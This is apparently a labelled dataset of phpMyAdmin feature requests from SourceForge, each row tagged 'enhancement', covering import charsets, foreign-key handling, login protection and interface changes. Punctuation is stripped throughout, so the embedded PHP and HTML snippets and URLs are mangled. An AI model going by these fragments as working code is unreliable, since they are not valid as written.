For example if I had a DB that look like DB MY DB.my app foo table DB MY DB.my app bar table DB MY DB.my app doh table DB MY DB.my app ray table DB MY DB.my app wii table if there was a a pull down option to copy in the with selected pull down in the database screen and a text box to indicate the new prefix to add on or more elaborately a regex if desired) such that if I had s my app my test it would then copy the table structure and contents for each table so that the new db would look like DB MY DB.my app foo table DB MY DB.my app bar table DB MY DB.my app doh table DB MY DB.my app ray table DB MY DB.my app wii table DB MY DB.my test foo table DB MY DB.my test bar table DB MY DB.my test doh table DB MY DB.my test ray table DB MY DB.my test wii table Original URL https sourceforge.net p phpmyadmin feature requests 1073 https sourceforge.net p phpmyadmin feature requests 1073 Original author dgtlrift","enhancement"
"24444","5773","Renaming of colums referenced as foreign keys in InnoDBs.
Using InnoDB as database format, phpMyAdmin is able to handle the foreign key definitions.
MySQL does not support renaming of columns referenced in other tables as foreign keys.
If you try altering such columns in phpMyAdmin it throws a MySQL error like this 1025 Error on rename of .\dbname\ sql 144c ee11 to .\dbname\tablename errno 150) It would be possible to catch this error in two ways First one is to check if the colums is referenced and forbid the user to rename the column.
Second, of course more complicated, but more comfortable for the user Read out the correspondig constrains, delete them, alter the table, recreate the constrains with new name s).
Tested with pma 2.11.4, Apache 2.2.4 Win32), Win2K3 Std, PHP 5.2.5, MySQL 5.0.41 Original URL https sourceforge.net p phpmyadmin feature requests 1074 https sourceforge.net p phpmyadmin feature requests 1074 Original author matschek","enhancement"
"24444","5774","search by IN ...) list.
Could you make the feature which provides searching with IN ...) MySQL statement?
Frequently occurs the case of need to search by only known list of IDs, for example.
The better choice is to search by `field IN id1,id2,id3...) Original URL https sourceforge.net p phpmyadmin feature requests 1075 https sourceforge.net p phpmyadmin feature requests 1075 Original author romy4","enhancement"
"24444","5775","warning of data reseting.
I had a varchar field with a unix timestamp in it and when I tried to change it to the timestamp fieldtype, it decided to clear the unix timestamp and just put 00 00 00 00 00 00 for all the values.
I realized that wasn t the type I wanted, but there was no warning that the field would be reset if the right value wasn t in there.
Original URL https sourceforge.net p phpmyadmin feature requests 1076 https sourceforge.net p phpmyadmin feature requests 1076 Original author darkfate26","enhancement"
"24444","5776","Export to ADOdb xmlschema format.
I d like to see the ability to export to the ADOdb xmlschema format.
This format is useful when working in an agile development environment as you can literally write any DB changes in xmlschema format and each contributer can then upgrade their own DB structure with a simple PHP importer script.
The format is XML with a domain specific schema.
See the docs at http phplens.com lens adodb docs datadict.htm xmlschema for examples and info.
I ve attached a sample parsing file, written by a coworker of mine.
I m specifically focusing on XML Schema Version 3, as defined at the URL above.)
Original URL https sourceforge.net p phpmyadmin feature requests 1077 https sourceforge.net p phpmyadmin feature requests 1077 Original author xangelusx","enhancement"
"24444","5777","Maria storage engine support needed.
MySQL have released new storage engine but support is missing from phpMyAdmin.
New engine is named to Maria and it may replace InnoDB quite soon I except).
So please, add support for this storage engine as soon as possible.
W Original URL https sourceforge.net p phpmyadmin feature requests 1078 https sourceforge.net p phpmyadmin feature requests 1078 Original author hanterm","enhancement"
"24444","5778","HTML code not displayed properly after insertion.
After having inserted some HTML code via a text field, the sql code which was used to insert the data) gets displayed, and with it, of course, the HTML.
This HTML should be escaped via PHP s htmlspecialchars ), and since it doesn t it is interpreted by the browser, which is awfully annoying.
It s a minor problem, but as I have a comment function on my website, where you are allowed to enter HTML, it s really strange to change the database entries with this bug ... if you can call it a bug.
Greets Original URL https sourceforge.net p phpmyadmin feature requests 1079 https sourceforge.net p phpmyadmin feature requests 1079 Original author campesr","enhancement"
"24444","5779","add documentation links to dbexport as attached.
lt;!
Could additional documentation links be added to the data section of the db export panel like gt; lt;p gt; lt;a href=http dev.mysql.com doc refman 5.0 en mysqldump.html option mysqldump complete insert option title= MySQL Ref Manual gt; lt;img class= icon src= .
themes original img b help.png width= 11 height= 11 alt= Documentation title= Increases output, but allows insert where table columns may not be the same as the original gt; lt; a gt; lt;br gt; lt;div class= formelementrow gt; lt;input type= checkbox name= sql columns value= something id= checkbox sql columns gt; lt;label for= checkbox sql columns gt;Complete inserts lt; label gt; lt; div gt; lt;a href=http dev.mysql.com doc refman 5.0 en mysqldump.html option mysqldump extended insert title= MySQL Ref Manual gt; lt;img class= icon src= .
themes original img b help.png width= 11 height= 11 alt= Documentation title= Use multiple row INSERT syntax that include several VALUES lists.
This results in a smaller dump file and speeds up inserts when the file is reloaded gt; lt; a gt; lt;div class= formelementrow gt; lt;input type= checkbox name= sql extended value= something id= checkbox sql extended gt; lt;label for= checkbox sql extended gt;Extended inserts lt; label gt; lt; div gt; Original URL https sourceforge.net p phpmyadmin feature requests 1080 https sourceforge.net p phpmyadmin feature requests 1080 Original author dg12","enhancement"
"24444","5780","Default charset of uploaded file be configurable.. On the Import page the charset dropdown defaults to UTF8.
This is currently not changeable by configuration.
If you usually import dumps in another charset e.g.
iso latin) this is very inconvenient and tends to destroy special characters.
There should either be a separate config parameter for this or at least the existing DefaultCharset parameter should be used like this in line 105 of libraries display import.inc.php echo PMA generateCharsetDropdownBox PMA CSDROPDOWN CHARSET, charset of file , charset of file , mysql charset map[ cfg[ DefaultCharset ]], FALSE); line number applies to Debian Etch packaged version 2.9.1.1 Debian 6 but should be similar in more current releases) Original URL https sourceforge.net p phpmyadmin feature requests 1081 https sourceforge.net p phpmyadmin feature requests 1081 Original author stefan lang","enhancement"
"24444","5781","add utility for errno 150 on innodb.
i always use InnoDb engine, so from time to time creates sqls shows the fatal errno 150 wich does not help too much.
reading comments on mysql official site http dev.mysql.com doc refman 5.0 en innodb foreign key constraints.html you will see that SHOW INNODB STATUS shows too much information, between them it also show information about the last InnoDb Error, wich is really shows more information about the error.
this really helps.
on the other hand, you already have this link inside phpmyadmin.
so why don t put some link to SHOW INNODB STATUS just after the error message IF the error is number 150?
this way will helps users to realice what the hell is going on with the refused innodb sql right away.
thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1082 https sourceforge.net p phpmyadmin feature requests 1082 Original author vladimirprieto","enhancement"
"24444","5782","Copy field structure to another table.
Hi, Today i realised i needed a function to copy entire structure of selected fields from one table to another.
If i should make some kind of backup table but with additional fields.
I could just create the new table with the additional fields and then copy selected fields from the main table to the backup table.
Or if you are using some generic fields as; status, creation timestamp etc etc.
it would be great to copy them from one table to another.
And also a functionality to select what field the fields should be inserted after.
Original URL https sourceforge.net p phpmyadmin feature requests 1083 https sourceforge.net p phpmyadmin feature requests 1083 Original author phliplip","enhancement"
"24444","5783","Load Data infile backquoted column names.
I frequently copy then past backquoted column names from a sql input screen of a table highlight columns on the right and then lt; lt; will insert backquoted and comma delimited field names into sql statement) into the IMPORT Load csv file screen.
Current ldi.php will produce error because it adds additional backquotes to the column name list I provided, which is already backquoted.
Solution Add the following code line just after line 93 and Just Prior to if strlen ldi columns) gt; 0) \{ sql .= ;...... remove backquotes and spaces so you can cut and past the fields names into the ldi function... ldi columns=str ireplace ` , ,str ireplace , , ldi columns) ); Original URL https sourceforge.net p phpmyadmin feature requests 1084 https sourceforge.net p phpmyadmin feature requests 1084 Original author tllong","enhancement"
"24444","5784","Operations for multiple tables.
It would be handy to be able to execute certain operations on multiple tables at once.
For example to rename and or copy a bunch of tables prefixed by foo to change the prefix to foo2 .
Thanks for considering.
Best regards, j fanque Original URL https sourceforge.net p phpmyadmin feature requests 1085 https sourceforge.net p phpmyadmin feature requests 1085 Original author j fanque","enhancement"
"24444","5785","mysql fix privileges DUMMY) see HELP forum.
this is a dummy for prviding a mysql fix privilege tables.sql.zip download link ...
Original URL https sourceforge.net p phpmyadmin feature requests 1086 https sourceforge.net p phpmyadmin feature requests 1086 Original author windkiel","enhancement"
"24444","5786","Avoid revealing MySQL version.
Is it possible to add an option in the configuration file priori etc phpmyadmin config.inc.php so does phpMyAdmin no information version to any user MySQL, the aim is to make the painful spot for a possible crack and sleep in peace for users if a curious asking the question.
homepage phpmyadmin index.php) Welcome to phpMyAdmin [version] does not show [version] I am authenticated page phpmyadmin index.php?
xxx lang = token = xxx) Server Version [version] replace [version] mysql Version of protocol to leave useful?
phpMyAdmin [version] at the top, right column, not to show [version] Version of MySQL client [version] to replace it with mysql page Show variables server phpmyadmin index.php?
xxx lang = token = xxx) version [version] to replace it with mysql version comment [version] does not show Original URL https sourceforge.net p phpmyadmin feature requests 1087 https sourceforge.net p phpmyadmin feature requests 1087 Original author eimdavid","enhancement"
"24444","5787","Numeric format.
Hi, At the moment the status page contains text like 2,441 KiB .
Could this be changed to 2.38 MiB ?
Two thousand kilobyte sounds weird compared to 2 megabyte.
Original URL https sourceforge.net p phpmyadmin feature requests 1088 https sourceforge.net p phpmyadmin feature requests 1088 Original author olafvdspek","enhancement"
"24444","5788","Designer option to create a PDF page.
Clicking the PDF button in the Designer view goes to the correct page, but the combobox is not populated.
Clicking export shows a popup dialog saying page not found.
The relationships between the db tables has been defined and the saved, but the database table used to populate the combo box is empty.
Original URL https sourceforge.net p phpmyadmin feature requests 1089 https sourceforge.net p phpmyadmin feature requests 1089 Original author suleja","enhancement"
"24444","5789","Default font size should be configurable.
Well it is, if you write cfg[ fontsize ] = ... to config, it works, but it is not documented and not included in defaults config file.
Original URL https sourceforge.net p phpmyadmin feature requests 1090 https sourceforge.net p phpmyadmin feature requests 1090 Original author nijel","enhancement"
"24444","5790","Save queries for easy access.
The SQL tab doesn t need a textarea that spans the whole screen; I d create a column on the right that lists your most recent queries, allowing you to click them and pop them into the textarea.
Original URL https sourceforge.net p phpmyadmin feature requests 1091 https sourceforge.net p phpmyadmin feature requests 1091 Original author randytayler","enhancement"
"24444","5791","brute force protection.
phpmyadmin can easily be attacked by brute force.
a simple protection would be, if login to phpmyadmin would be forbidden for 1 minute after 5 wrong loginattempts.
loginattempts can be stored stored in the session, cookie or pma tables or all three) Original URL https sourceforge.net p phpmyadmin feature requests 1092 https sourceforge.net p phpmyadmin feature requests 1092 Original author rubo77","enhancement"
"24444","5792","Auditlog.
It would be great if there would be a config option to force all executed non SELECT) statements into an auditlog on a per user basis.
Original URL https sourceforge.net p phpmyadmin feature requests 1093 https sourceforge.net p phpmyadmin feature requests 1093 Original author lsmith77","enhancement"
"24444","5793","renaming a column of a MyISAM table.
should automatically alter the previously created index onto that column.
Original URL https sourceforge.net p phpmyadmin feature requests 1094 https sourceforge.net p phpmyadmin feature requests 1094 Original author toralf foerster","enhancement"
"24444","5794","tbl export selactable columns to export.
Hello it would be nice if the tbl export.php has a selection field for columns to export like db export.php with tables.
db export.php implemented) lt;select name= table select[] size= 6 multiple= multiple gt; lt;option value= table1 selected= selected gt;table1 lt; option gt; lt;option value= table2 selected= selected gt;table1 lt; option gt; ... tbl export.php feature request) lt;select name= column select[] size= 6 multiple= multiple gt; lt;option value= column1 selected= selected gt;column1 lt; option gt; lt;option value= column2 selected= selected gt;column1 lt; option gt; ... ThX Original URL https sourceforge.net p phpmyadmin feature requests 1095 https sourceforge.net p phpmyadmin feature requests 1095 Original author misterx1980","enhancement"
"24444","5795","cannot enter connection for federated engine table.
update the create table interface so that when selecting federated as the database engine, the interface ask for username password server name database name table name Original URL https sourceforge.net p phpmyadmin feature requests 1096 https sourceforge.net p phpmyadmin feature requests 1096 Original author woodspire","enhancement"
"24444","5796","small improvement in generated SQL.
Hello, creating a new database and copying in parallel the SQL statements into an install script I realized, that the CREATE TABLE statement isn t ended with a semicolon and the CREATE DATABASE statement has a leading space character before the last semicolon.
Original URL https sourceforge.net p phpmyadmin feature requests 1098 https sourceforge.net p phpmyadmin feature requests 1098 Original author toralf foerster","enhancement"
"24444","5797","choose database if exists) with name equal to the user name.
Eg having user test the databse test could be selected automatically.
Original URL https sourceforge.net p phpmyadmin feature requests 1097 https sourceforge.net p phpmyadmin feature requests 1097 Original author toralf foerster","enhancement"
"24444","5798","mass table prefix change.
When using the copy database function in Operations see attachment), how difficult would it be to add a button to alter table and change or remove the table prefix during the copy.
Backing up, copying, or moving tables between databases is a real pain.
When using one MySQL, the prefixes ID the different dbs, but changing the prefix for each table of a db so you can restore a db is extremely unruly.
I use PHPMyAdmin so I don t have to become a MySQL expert.
I didn t spend a lot of time searching before creating this feature request.
If it is a duplicate, please point me there.
Original URL https sourceforge.net p phpmyadmin feature requests 1100 https sourceforge.net p phpmyadmin feature requests 1100 Original author iseeuu","enhancement"
"24444","5799","Progress bar for long tasks.
Hi, I am running processes which usually last over 1300 seconds.
Yet I do not have a visual indicator that tells me if the machine is happily processing or if it simply has choked.
Would it be possible to have a progress bar or a task bar or at least a color indicator to show me that the process is still continuing?
For example Creating index OK, next check 60 sec.
Running query OK, next check 30 sec.
This would also be great for large uploads Uploading 450 MB OK, next check 60 sec.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin feature requests 1099 https sourceforge.net p phpmyadmin feature requests 1099 Original author dhinostroza","enhancement"
"24444","5800","distinct colors for every table.
refering to this idea http sourceforge.net tracker index.php?func=detail aid=948604 group id=23067 atid=377411 there is still the idea of having a certain color for every table, generated by table name and database name.
thus, the eye would catch easily, which table you are editing at the moment.
Original URL https sourceforge.net p phpmyadmin feature requests 1101 https sourceforge.net p phpmyadmin feature requests 1101 Original author rubo77","enhancement"
"24444","5801","Create INSERT query.
Hi all, When inserting data from my applications, i always use this form of INSERT.. INSERT INTO table field1, field2, field3) VALUES value1 , value2 , value3 ); This normally requires some tabbing between PMA and my editor.
To read the specific fields or copy paste field names from PMA to editor one at the time.
So sometimes i just use the Insert function in PMA and copy the query.
But i don t think it s optimal to actually get test data into the table.
So i usually deletes the data and changes the AUTO INCREMENT value.
This is no big issue while the website is in developent.
But once it has gone to production this is not the way to go!
So all i ask for is Generate Insert Query feature that can generate an INSERT query without add ing data to table.
This is how i imagine it could be solved.
For instance under Insert tab, there could be an extra option in the Insert as new row drop down.
Create query no insert) , and perhaps a way to populate empty fields with data, also using Function.
without populate INSERT INTO people field id, field status, field name, field password) VALUES null, 0 , Philip , MD5 somepass )); In without populate i have input Philip into field name and somepass into field password and selected MD5 for function on field password.
Empty fields should get their default value, 0 in field status case.
And autoincrement fields should just get null if empty.
with populate INSERT INTO people field id, field status, field name, field password) VALUES null, field status , Philip , MD5 field password )); In with populate i have only input Philip into field name.
and selected MD5 as function for field password.
The autoincrement fields i think should be null if empty.
Other empty fields should just be populated with field as data, as with field status and field password.
I hope this request is not totally stupid ) I could sure use it!
Original URL https sourceforge.net p phpmyadmin feature requests 1102 https sourceforge.net p phpmyadmin feature requests 1102 Original author phliplip","enhancement"
"24444","5802","No correctly inserting editing of large VARCHAR.
Because of using lt;input type= text gt; for VARCHAR fields it s not able to insert or edit large values to these fields because the maximum lenght of the textfield values are limited by HTML and or the browsers.
Suggest for solution Using textarea for lager VARCHAR fields.
Original URL https sourceforge.net p phpmyadmin feature requests 1103 https sourceforge.net p phpmyadmin feature requests 1103 Original author dubaut","enhancement"
"24444","5803","blocks library but not lang dir via htaccess.
Hi, A .htaccess file is included to block access to the library dir.
However, the lang dir doesn t have such a file while I think it equally doesn t need any web access.
cheers, Thijs Original URL https sourceforge.net p phpmyadmin feature requests 1104 https sourceforge.net p phpmyadmin feature requests 1104 Original author kink","enhancement"
"24444","5804","CASE HCI Speed Enhancement.
The second problem is lack of autoincrement bulk setup Lack of index bulk setup Lack of default field size tick box bulk As wizard around tables.
Can this be added?
Thats all four of my issues over 5 years using it Original URL https sourceforge.net p phpmyadmin feature requests 1105 https sourceforge.net p phpmyadmin feature requests 1105 Original author existrix","enhancement"
"24444","5805","disallow root login with empty password.
Hi all, At least in Debian s context, the issue of MySQL not having a root password, and installing phpMyAdmin opening that up to the world is a frequently recurring issue that people are concerned with.
While I think it s people s own responsibility to correctly set MySQL s root password, this is apparently something that concerns many people.
On the other hand, the cases where users really make useful use of logging on as root without a password are probably very limited.
So I think the following could make sense by default, disallow logins of root without a password.
add a config option like allowRootLoginEmptyPassword that defaults to false but that the user can decide to set to true if they require the functionality.
I think it hardly hurts, and does pacify a large number of concerns over this.
If such a thing would be acceptible, I d gladly make a patch, let me know.
thanks, Thijs Original URL https sourceforge.net p phpmyadmin feature requests 1106 https sourceforge.net p phpmyadmin feature requests 1106 Original author kink","enhancement"
"24444","5806","2.11.9 Server 4.0 vs. lib 5.0 import select at bool edit.
Our ISP is either lazy or stupid and excuses it with compatibility), still runs a MySQL 4.0.27 server and is afraid to upgrade because some user of that webserver might have migration troubles... but also runs PHP with MySQL library v5.0.32.
Of course, phpMyAdmin warns about unexpected side effects!
Well, one of those is that in the dataset edit page, fields created as BOOL and stored as CHAR 1) BINARY ) also each contain a SELECT from the database import page, listing importable files in the import directory.
I would not be surprised if your suggested solution is update the MySQL server ... Shame on our ISP running dangerously outdated software.
Original URL https sourceforge.net p phpmyadmin feature requests 1107 https sourceforge.net p phpmyadmin feature requests 1107 Original author ligh1l","enhancement"
"24444","5807","Schema Description Metadata.
I thought, since any good piece of software has comments, permit people to associate descriptive information with their schema to help others navigate the database schema.
This would just be an option of phpmyadmin that would be offered as a flag in the configuration area, and would say load and access a table with the description information, per column, per table, with a description blob.
Accessible as a popup note when rolling over a small note icon in the tables.
I figured this would be useful when one adds columns into tables at a later date and needs a refresher to determine why the column or table was added.
When SQL is dumped, the descriptions will be embedded in the SQL as comments.
Original URL https sourceforge.net p phpmyadmin feature requests 1108 https sourceforge.net p phpmyadmin feature requests 1108 Original author rofthorax","enhancement"
"24444","5808","Drop down for Jump to Recent table list.
Have a drop down that appears just under the top tabs Browser | Structure | SQl | ETC This drop down shows a list of the 10 most recent tables you have viewed If you have a load of tables, in multiple databases, jumping back and forth between them can be a little slow.
The preferences should allow you to set 1) Show last x gt; you should be able to choose how many table to list in the drop down from 1 to 20 maybe 2) Only show tables in current DB or show tables across all your DBs 3) Jump to Browse view or Jump to Structure view when selecting a table.
My preferences would be 1) show last 10 tables 2) show tables across all databases 3) jump to structure view Maybe even have a radio select to hit for browse view or structure view which you can select before selecting the table.
This would be really really helpful.
Keep up the great work Trent Original URL https sourceforge.net p phpmyadmin feature requests 1109 https sourceforge.net p phpmyadmin feature requests 1109 Original author eltreno","enhancement"
"24444","5809","user prefs LoginCookieValidity.
This timeout value should be changeable by each user and probably kept in a future) user preferences module.
Original URL https sourceforge.net p phpmyadmin feature requests 1110 https sourceforge.net p phpmyadmin feature requests 1110 Original author lem9","enhancement"
"24444","5810","Config directive for default charset on import.
To continue with what has been said on this page https sourceforge.net tracker index.php?func=detail aid=2080963 group id=23067 atid=377408 In harmony with cfg[ Export ][ charset ], that set default charset on the Export page, let s make another one cfg[ Import ][ charset ], that will set default charset on the Import page.
libraries display.import.lib.php line 91 if temp charset == charset) \{ Replace with if empty cfg[ Import ][ charset ]) temp charset == charset) || temp charset == cfg[ Import ][ charset ]) \{ libraries config.default.php, Import defaults block.
Add empty directive cfg[ Import ][ charset ] = ; Documentation.txt, line 1044 Setting this to TRUE also activates a pull down menu in the Export page, to choose the character set when exporting a file.
The default value in this menu comes from cfg[ Export ][ charset ].
As variant Setting this to TRUE also activates a pull down menu in the Export and Import page, to choose the character set when exporting or importing a file.
The default value in this menu comes from cfg[ Export ][ charset ] and cfg[ Import ][ charset ], respectively.
Original URL https sourceforge.net p phpmyadmin feature requests 1111 https sourceforge.net p phpmyadmin feature requests 1111 Original author hanut","enhancement"
"24444","5811","Edit database priveleges from db privileges tab.
One thing I find particularly annoying is the following after I create a new database, I am transferred to the database page.
I now want to grant a user access to this database.
the natural place to go now is the privileges tab, but it contains a list of users with access, and I can t add a new user or allow an existing user to access the database.
so, I propose to add the database privileges tab some editing functionalities.
Original URL https sourceforge.net p phpmyadmin feature requests 1112 https sourceforge.net p phpmyadmin feature requests 1112 Original author omry y","enhancement"
"24444","5812","drop table violates constraints.
Sometimes, attempting to drop a table will fail, because the table has effective constraints you then have to manually empty the table, and then drop it.
This is particularly annoying when you re trying to drop a large number of tables, and have to go back many times and manually empty each failing table...
I suggest checking for constraints, and if constraints are in effect for a table being dropped, do a truncate first as emptying out the table will not cause constraint violations), and then drop the table.
Original URL https sourceforge.net p phpmyadmin feature requests 1114 https sourceforge.net p phpmyadmin feature requests 1114 Original author mindplay","enhancement"
"24444","5813","Change the appearance of the PDF SCHEMA.
Right now, I m working on a 40 tables InnoDB database with many FK going around.
I wanted to print the relations using the pdf tool, but I m having a problem.
As I see it, when you send it to print, the only option you have is for the tables to be big which means that all fields are listed.
For me that is the worst case I could get, since I can t find a way to arrange all on screen and still be legible.
Ideally I would like to have the option to only show the fields which HAS a FK with another table, if that is not an option, to show the tables as small i.e.
only the table name and the relationship lines).
This would give us a much cleaner export, especialy when we are talking about 20 big tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1113 https sourceforge.net p phpmyadmin feature requests 1113 Original author yohanleafheart","enhancement"
"24444","5814","ability to disable the mcrypt warning.
We have an installation of phpMyAdmin that uses the cookie authentication mode.
We do not have mcrypt installed due to problems we encountered trying to get mcrypt included in our php installation.
Since we are aware that mcrypt is not installed, we would like to disable the warning message Cannot load mcrypt extension.
Please check your PHP configuration) so that it does not confuse our users.
To do this, I commented out line 25 define PMA WARN FOR MCRYPT , 0);) in libraries auth cookie.auth.lib.php.
It would be nice if phpMyAdmin provided a configuration variable that would allow a user to disable that particular warning.
Original URL https sourceforge.net p phpmyadmin feature requests 1115 https sourceforge.net p phpmyadmin feature requests 1115 Original author deb942","enhancement"
"24444","5815","Perform a mysqldump when dropping a database.
I ve done it, we ve all probably done it.
You go to drop a table and end up dropping the whole database instead.
There s no recovery to that restore from last backup.
I ve done it twice, once it cost me half a day s work and the other one, done yesterday, I get to start the database from scratch.
I would like to see the system dump the database into a backup file and save it on the file system before it drops the whole database.
Thus giving us something to recover from if we didn t actually intend to drop the whole database.
Screen shot This shows the layout of how I did it both times.
Go into the database, check the two tables you want removed and click to the big drop button at the top.
Say obscene words, throw keyboard, and then post message about how stupid you are and how you would like those smarter then you to fix your stupidity!
I am willing to make the change myself and submit it.
Original URL https sourceforge.net p phpmyadmin feature requests 1116 https sourceforge.net p phpmyadmin feature requests 1116 Original author alanbdee","enhancement"
"24444","5816","link to Documentation dropped from login page.
Hi, In a recent commit the link to Documentation.html that used to be on the login screen was dropped, while I m not clear on why that was.
It was requested in the past following a Debian bug that raised the issue that the user has no way to access the documentation without logging in, e.g.
to find out which credentials are required.
Could you be so kind to readd the link?
cheers, Thijs Original URL https sourceforge.net p phpmyadmin feature requests 1117 https sourceforge.net p phpmyadmin feature requests 1117 Original author kink","enhancement"
"24444","5817","LoginCookieValidity may clash with gc maxlifetime.
Hi, A Debian user reported that increasing LoginCookieValidity did not work for him.
It turned out that his PHP s session.gc maxlifetime setting got in the way and was shorter than this timeout, so the session got garbage collected earlier.
I think it should be documented at this option that the user needs to ensure that PHP s session.gc maxlifetime is greater than the value of LoginCookieValidity.
I don t think it s necessary to fiddle with session.gc maxlifetime as phpMyAdmin as this may adversely affect other applications running on the same host.
Original URL https sourceforge.net p phpmyadmin feature requests 1118 https sourceforge.net p phpmyadmin feature requests 1118 Original author kink","enhancement"
"24444","5818","Configurable default font size.
It will be nice to be able to configure default font size.
Instead of using hardcoded value 82 in Config.class.php, function getFontsizeSelection ), I recommend to introduce config value FontsizeDefault .
Required changes are minor and could be done very fast.
Original URL https sourceforge.net p phpmyadmin feature requests 1119 https sourceforge.net p phpmyadmin feature requests 1119 Original author faca","enhancement"
"24444","5819","Don t hide indexes by default).
Hi, At first I thought indexes weren t shown anymore on the structure page, but then I saw they were hidden by default.
Please don t. It doesn t make sense to hide stuff at the bottom of a page anyway.
At the top or in the middle?
Maybe, but not at the bottom.
Original URL https sourceforge.net p phpmyadmin feature requests 1120 https sourceforge.net p phpmyadmin feature requests 1120 Original author olafvdspek","enhancement"
"24444","5820","setup script doesn t tell to generate .htaccess.
I m a phpmyadmin newbie and recently installed it using the setup script to build the config file.
Copying the previous configuration I made it config based, entered password etc and away we went.
After a couple of days I had a query as to why the user wasn t being prompted to login and realised I should have generated a .htaccess .htpasswd pair for the phpmyadmin directory.
The setup tool should volunteer to help with this.
Consequently anyone who uses setup scripts to generate a config based installation might be running unsecured.
Original URL https sourceforge.net p phpmyadmin feature requests 1122 https sourceforge.net p phpmyadmin feature requests 1122 Original author epo001","enhancement"
"24444","5821","AJAX conversion.
Would love to have the tool use AJAX to speed up the interface and usage.
I d be willing to build the thing myself if I thought it would be adapted into the public version.
Not going to go through all that work just for myself, not to mention not being able to upgrade alongside new versions of PMA. )
Original URL https sourceforge.net p phpmyadmin feature requests 1121 https sourceforge.net p phpmyadmin feature requests 1121 Original author garethop","enhancement"
"24444","5822","Table status sorting.
Hi, It s a bit hard to manually spot the large tables in a huge table status list.
Could you add an option to sort the table based on size?
Original URL https sourceforge.net p phpmyadmin feature requests 1124 https sourceforge.net p phpmyadmin feature requests 1124 Original author olafvdspek","enhancement"
"24444","5823","Use Host Table option when adding new user.
IRC user EarthLion asked a question about adding new users.
In the Host dropdown, there s an option for Use Host Table but none of us knew what that meant, nor was it explained in Documentation.html.
What does this setting do?
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1125 https sourceforge.net p phpmyadmin feature requests 1125 Original author ibennetch","enhancement"
"24444","5824","Allow SQL query textarea growable resizable.
There s a problem with long lined sql queries in PMA, because textarea name= sql query and in querywindow.php too) is not resizable manually or automatically), so the whole sql query needs widget to be scrolled to take view in.
Additionally, when clicking Edit http phpmyadmin tbl sql.php?db=test table=groups sql query=SELECT 2A FROM 60groups 60 where id 3D 2 show query=1 ... querybox) the query should be formatted with new lines like the import.php does in browse view.
Original URL https sourceforge.net p phpmyadmin feature requests 1126 https sourceforge.net p phpmyadmin feature requests 1126 Original author piotrbudny","enhancement"
"24444","5825","display of VARCHAR fields changed.
Concerning phpMyAdmin.3.0.x In 3 it seems all VCHAR fields show up as BINARY, but can be viewed by selecting the Options panel and checking Show BINARY .
It would be most helpful if those Show option defaults could be configured of if they can I don t see it in the documentation).
There used to be a ShowBlob configuratation option cfg[ ShowBlob ] = true; display blob field contents but that does not seem to work any longer.
Also, putting a lt;br gt; between the Options Show BINARY and Show BLOB makes the display a lot nicer ) Original URL https sourceforge.net p phpmyadmin feature requests 1127 https sourceforge.net p phpmyadmin feature requests 1127 Original author ksteffenhagen","enhancement"
"24444","5826","Remaing the Host.
I would like to see a feature added that allows the user to easily configure the host name.
For example instead of always having it as localhost or 127.0.0.1 allowing that to be changed by the user.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1128 https sourceforge.net p phpmyadmin feature requests 1128 Original author cmorehead","enhancement"
"24444","5827","Allow designer to show other Databases.
One feature I would like to see is the ability to see on the designer, and on the Relations View, even if it is based on a global setting, all the valid index on other databases not the current one only.
On my current project, we have a central InnoDB DB called basic info, and each module implements a new DB and have tons of foreign keys references to this basic info.
Right now I have to right the SQL everytime I want to add a new FK to this other DB, since it doesn t show on the dropdown menu on the Relation View .
Nor I can put these tables on the designer.
Is it possible?
And if so, lem9, I m willing to try to tackle this problem and do a patch for it.
Just need some pointers, specially on the designer part.
Original URL https sourceforge.net p phpmyadmin feature requests 1129 https sourceforge.net p phpmyadmin feature requests 1129 Original author yohanleafheart","enhancement"
"24444","5828","option for Timestamp in Filename.
Many of us do many exports on a regular basis and have several backups of any given DB.
It would be fantastic if there was an option to output the DB with a timestamp appended to the filename.
Original URL https sourceforge.net p phpmyadmin feature requests 1130 https sourceforge.net p phpmyadmin feature requests 1130 Original author govatron","enhancement"
"24444","5829","db search.php selected all tables open.
db search.php selected all tables open.
is selected= wrong.
is selected= selected true.
Original URL https sourceforge.net p phpmyadmin feature requests 1131 https sourceforge.net p phpmyadmin feature requests 1131 Original author kidalabama","enhancement"
"24444","5830","Ideas for no frame version.
From an anonymous contributor What I d really like to see in a future release is scrapping the frames system.
There are very simple and well supported ways these days of keeping a static and scrollable left menu without using frames, namely using position fixed and overflow auto on a CSS div.
I can t keep count of the number of times I ve pressed refresh on the browser to reload a page and the whole frameset has reloaded from scratch!
Do you know of a way to refresh the left menu in case a user deletes a table or creates a table from the main section?
Ah, good point.
I think there are three possible solutions here.
1) The first suggestion is probably the most correct but probably the hardest to get to given the current code base.
Replace calls of echoing HTML by building it up in an html array, then at the end, compile your menu as menuHtml.
Finally at the end of the page do echo menuHtml .
html .
In general, I personally find that html building leads to more flexible coding in the long run than using echo directly.)
2) Presumably you could use the PHP output buffering stuff to stop the output being displayed to screen.
Then call html = ob get clean ).
Then do as per 1) above compile menuHtml and then echo menuHtml .
html .
3) Probably the simplest but arguably not ideal in terms of placement in the HTML order but still probably better than a frameset.
Simply compile and echo the menu at the end of the page, but use CSS fixed positioning to place it on the left hand side of the page.
4) An iframe could also be considered, but I have to say that really feels nasty, and would probably require javascript to refresh.
Original URL https sourceforge.net p phpmyadmin feature requests 1132 https sourceforge.net p phpmyadmin feature requests 1132 Original author lem9","enhancement"
"24444","5831","3.1.0 rc1 comments.
Could you swap the browse and structure tabs, as you ve also swapped them in the nav bar?
The tooltip for structure in the nav bar is browse 4), while the tooltip for browse in it is just 4), I think this isn t right.
If you add a primary key in the structure tab, it does drop primary key, add ...
I m not sure I prefer an existing primary key to be dropped automatically compared to getting an error.
If I add a field and type in the default box, the default type isn t automatically switched to As defined .
If I m at the add field page and click on add another) field, it detaults to As defined instead of the normal default of None .
I think auto increment should not be written as just A I. Greetings Original URL https sourceforge.net p phpmyadmin feature requests 1133 https sourceforge.net p phpmyadmin feature requests 1133 Original author olafvdspek","enhancement"
"24444","5832","Displayed Size in db structure.php.
Hi there.
What do you think about this little improvement I modified the code myself) When displaying all tables with db structure.php the column size could be configurable e.g.
I prefer that there is only one unit size Mb=Megabytes.
Also an good improvement could be the possiblity to sort the columns.
I can sort by number of entries, or by size or by engine type or name.
